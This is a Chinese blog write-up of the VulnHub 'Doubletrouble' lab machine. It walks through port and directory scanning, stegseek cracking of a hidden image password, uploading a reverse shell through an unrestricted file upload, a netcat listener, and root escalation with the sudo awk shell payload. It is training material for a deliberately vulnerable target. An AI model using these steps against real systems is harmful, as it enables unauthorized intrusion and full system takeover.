VulnHub日记(九):Doubletrouble

最新推荐文章于 2024-04-11 09:30:15 发布
最新推荐文章于 2024-04-11 09:30:15 发布
阅读量1.4k 收藏
点赞数
分类专栏: VlunHub日记 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44107836/article/details/120348058
版权

靶机介绍

虚拟机链接:doubletrouble: 1 ~ VulnHub

参考博客:DoubleTrouble - HackMyVM - Vulnhub - Writeup - Security

开始练习

本机ip:192.168.56.102

目的机ip:192.168.56.122

netdiscover -r 192.168.56.0/24

nmap -A 192.168.56.122

 开放80和22端口,访问web页面,同时使用dirsearch枚举目录

# dirsearch  -e txt,bak,zip,img,jpg,php,html,js -u http://192.168.56.122

 访问目录,认为secret中发现的命名特殊的图片,和install目录较为可疑,但是下载图片后不知道怎么利用,参考博客后,了解使用stegseek暴力破解了图片隐写

 

 

 

stegseek /root/Desktop/doubletrouble.jpg /root/Desktop/rockyou.txt -xf output
cat output

 将获得的用户名密码输入web页面,成功登入后台

 在任意创建项目,用户头像等处的文件上传都没有格式限制,任选一处上传反弹shell,在之前扫描到的目录中uploads目录下访问

 

 

 

 先开启监听端口,访问文件,成功反弹shell

nc -nvlp 4396

 查看可以免密root运行的文件,发现可以利用awk提权

参考:awk | GTFOBins

sudo -l

 按照参考资料执行如下payload,成功提权获得rootshell

sudo awk 'BEGIN {system("/bin/sh")}'

 

Dawn_Xiiii
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
VulnHub doubletrouble
weixin_45682839的博客
10-11 345
涉及知识:端口服务探测、敏感目录收集、WEB信息搜集、框架漏洞利用、利用代码修改、图片隐写破解、linux本地提权、SQL注入等。
vulnhub靶场-DoubleTrouble
qq_42947816的博客
07-12 1158
Vulnhub旨在提供环境,让任何人都能在数字安全、计算机软件和网络管理方面获得实际的“实践”经验。
vulnhub靶场之double:1
weixin_42478365的博客
05-10 503
文件读取漏洞配合一句话木马,造成远程代码任意执行漏洞;SUID提权(/usr/bin/nice)
探索隐藏的秘密:StegSeek - 图像隐写术检测工具
最新发布
gitblog_00016的博客
04-11 460
探索隐藏的秘密:StegSeek - 图像隐写术检测工具 项目地址:https://gitcode.com/RickdeJager/stegseek 在数字时代,信息的安全与隐私保护变得越来越重要。一种被称为图像隐写术的技术,允许人们在看似普通的图片中隐藏秘密数据。而今天我们要介绍的是一个名为StegSeek的开源项目,它是一个强大的图像隐写检测工具,帮助安全专家和爱好者发现潜在的隐藏信息。 项目...
Vulnhub靶机:doubletrouble
qq_48904485的博客
01-06 994
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:doubletrouble(10.0.2.7)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/doubletrouble-1,743/
vulnhub靶机-doubletrouble: 1
yc11223344的博客
08-25 678
攻击机:192.168.100.128靶机:192.168.100.130。
Vulnhub-DOLI: 1渗透
laoyanCZ的博客
11-27 1706
点我直接下载靶机。
DoubleTrouble:Bootcamp Innopolis项目2015
05-20
双重麻烦Bootcamp Innopolis项目2015
doubletrouble:html5 w vim快捷方式中的两人游戏
05-26
双重麻烦 带有html5 w / vim快捷键的... 要开始玩,请抓住一个朋友并前往 如果您有兴趣帮助: git clone https://github.com/jonathanballs/doubletrouble.git cd doubletrouble npm install . 启动服务器 node .
vulnhub靶场 breach1 writeup
weixin_43410194的博客
08-18 171
vulnhub靶场 breach1 writeup 这篇思路有点乱)
vulnhubdoubletrouble: 1
weixin_54431413的博客
06-05 898
开源项目信息收集 框架漏洞突破边界 利用sudo配置不当进行提权 tabby工具远程连接linux,sftp传输文件 sql之时间盲注拿到密码打点成功 脏牛漏洞提权成功,复原/etc/passwd 改掉root密码
Vulnhub靶机——DOUBLE: 1
qq_51295120的博客
03-18 3988
靶机下载链接在这 VMware和VirtualBox进行互通可参考:Vulnhub靶机——SHENRON: 1 1.主机发现: netdiscover -r 172.16.10.0/24 -i eth0 2. 信息收集: 使用nmap进行全端口服务版本扫描: nmap -n -T5 -p- -sV -sS 172.16.10.212 发现靶机服务器开启了四个端口:22,25,80,8080;其中有80和8080都是http服务 3. 渗透测试 这里有两个超链接:Production和TEST 点击Pr
vulnhub-doubletrouble
weixin_50683638的博客
12-08 417
靶机:http://www.vulnhub.com/entry/doubletrouble-1,743/ 网络模式:nat 攻击机kali(nat) 1,扫描靶机IP 2,扫描存活端口 3,目录扫描,查看有用的信息 sudo arp-scan -l扫描同网段的靶机ip nmap -P 1-65535 -A 192.168.6.13722,80端口 访问 dirb http://192.168.6.137扫描目录看到两个比较特殊的文件secret,uploads 访问,看到一张图片,查看图片下载下来
vulnhunb之doubletrouble:1
qwweggfe的博客
09-18 1664
由于这个靶机比较简单,所以我就直接写渗透过程了: 首先进行ip扫描 于是打开网页进行查看 发现他是qdPM 9.1搭建,我在网上查找发他有远程文件上传的漏洞,但是我们又没有用户名密码,于是我进行目录扫描 NVD - CVE-2020-7246 gobuster dir -r -u http://192.168.181.166/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html..
Vulnhub靶场】DOUBLETROUBLE: 1
DG_s1mple
03-14 489
环境准备 把下载好的文件导入到vmware里面 题目里没有给出ip地址,需要我们自己去探测 信息收集 kali使用命令arp-scan命令探测IP地址 靶机IP地址为:192.168.2.18 攻击机IP地址为:192.168.2.16 我们使用namp扫描一下靶机 只开放了ssh跟http 渗透开始 我们首先访问靶机的网站 是一个登录界面,没有什么信息,我们使用dirsearch扫描一下靶机的目录 都访问一下,然后发现secret目录下有一张图片 我们把它下载下载用stegseek爆破查一下是
kali-vulnhub:doubletrouble
curme_miller的博客
01-26 4123
1.安装好doubletrouble靶机,界面如下:(kali:192.168.0.104;靶机:192.168.0.110) 为Debian,没有发现较明显的信息 2.开始扫描端口 $ nmap -Pn 192.168.0.110 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org
vulnhub DOUBLETROUBLE: 1靶机
小小猪的博客
09-06 314
直接上传,访问/uploads/users/目录,可以看到上传成功。可以获得个半交互模式,发现有个ova文件,开启python进行下载。下载脏牛的文件,这里要下载到kali,kali开启服务进行下载。rockyou.txt文件需要解压,第一次用的要去解压一下。在在线的shell生成中,生成shell。访问80端口,觉得存在sql注入。ssh进行登录,获得root权限。看到有张图片,猜测存在信息。首先扫描出靶机IP地址。再次扫描靶机IP地址。查看版本,存在脏牛漏洞。下载.deb文件安装。搜索awk提权方式,
vulnhub:doubletrouble1靶机
qq_63283137的博客
10-03 167
根据之前爆破的uploads目录,查看已经上传成功(要多观察下文件到底上传成功没有),爆出两组的账户密码,尝试登录80端口http、22端口ssh。查看当前用户的sudo权限,发现可以sudo执行awk命令。是个管理员登录界面,使用burp弱口令爆破,无用。发现这个主题有个文件上传的命令执行漏洞,先留着。#-xf 将破解出的信息存放到指定的文件里。是个登录界面,随手ssh爆破试试。尝试访问上面的目录,发现有个图片。发现有个ova镜像文件,下载下来。在访问上传的文件之前执行监听。分析漏洞,发现可以上传文件。
vulnhub之DC5
底层社会中的弱智
01-20 512
在前面的总结,遇见多参数的传值,可以尝试wfuzz来查看是否存在隐藏参数或者检测LFI漏洞 找到目标机器的IP为192.168.1.110 使用nmap来扫描一下开放的端口以及服务 80端口http服务(敏感目录爆破,十大常规漏洞的检测,中间件解析漏洞) 111端口rpc服务 NFS网络文件共享(showmount -a ip来查看具体的文件) 我先使用showmount命令来查看一下...
doubletrouble靶机
08-29
第一个地址是https://download.vulnhub.com/doubletrouble/doubletrouble.ova,可以下载一个ova文件来部署虚拟机。第二个地址是https://www.vulnhub.com/entry/doubletrouble-1,743/,可以获取更多有关靶机的描述...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值